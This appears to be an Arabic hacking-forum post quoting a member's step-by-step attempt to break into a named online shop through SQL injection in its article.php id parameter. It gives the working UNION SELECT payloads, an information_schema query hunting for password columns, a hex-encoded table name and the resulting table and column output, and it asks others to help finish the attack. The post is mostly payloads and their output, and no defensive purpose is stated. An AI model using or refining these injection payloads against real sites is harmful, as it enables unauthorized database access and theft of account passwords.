عرض مشاركة واحدة
قديم 01-22-2011, 12:59 AM   رقم المشاركة : 221 (permalink)
معلومات العضو
Masaru
 
الصورة الرمزية Masaru
 

 

 
إحصائية العضو





Masaru غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Masaru is on a distinguished road

افتراضي


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة عبد الصمد
موقع جديد

http://www.shopmbtnice.com/article.php?id=-1

عدد الاعمده المصابه 4

كود PHP:
UNION SELECT 1,2,3,
العامود المصاب 4

أصدار القاعده 5

كتبت الاستغلال كامل

كود PHP:
http://www.shopmbtnice.com/article.php?id=-1 UNION SELECT 1,2,3,concat(table_Name,0x3a,column_Name,0x3a,table_schema),5+From+information_schema.columns+Where+column_name+like+CHAR(37, 112, 97, 115, 37)-- 
طلع لي

كود PHP:
tb_account:password:shopmbtnice 
أضفت على الاستغلال السابق كلمت Group

الناتج

كود PHP:
tb_account:password:shopmbtnice
tb_email
:password:shopmbtnice 

أخذت هذي الكلمه (tb_account) وشفرتها في موقع التشفير

وكتبت

كود PHP:
where+table_Name=0x74625f6163636f756e74 
بدل أستعلام جدول الباس

طلع الناتج

كود PHP:
tb_account:id:shopmbtnice 
أنا ألي هنا وقفت ما عرفت أكمل

وأحنى هنا على شان نتعلم من بعض

والي قدر يحقن الموقع يقلي أذا كان عندي خطأ ولا لا

بالتوفيق للجميع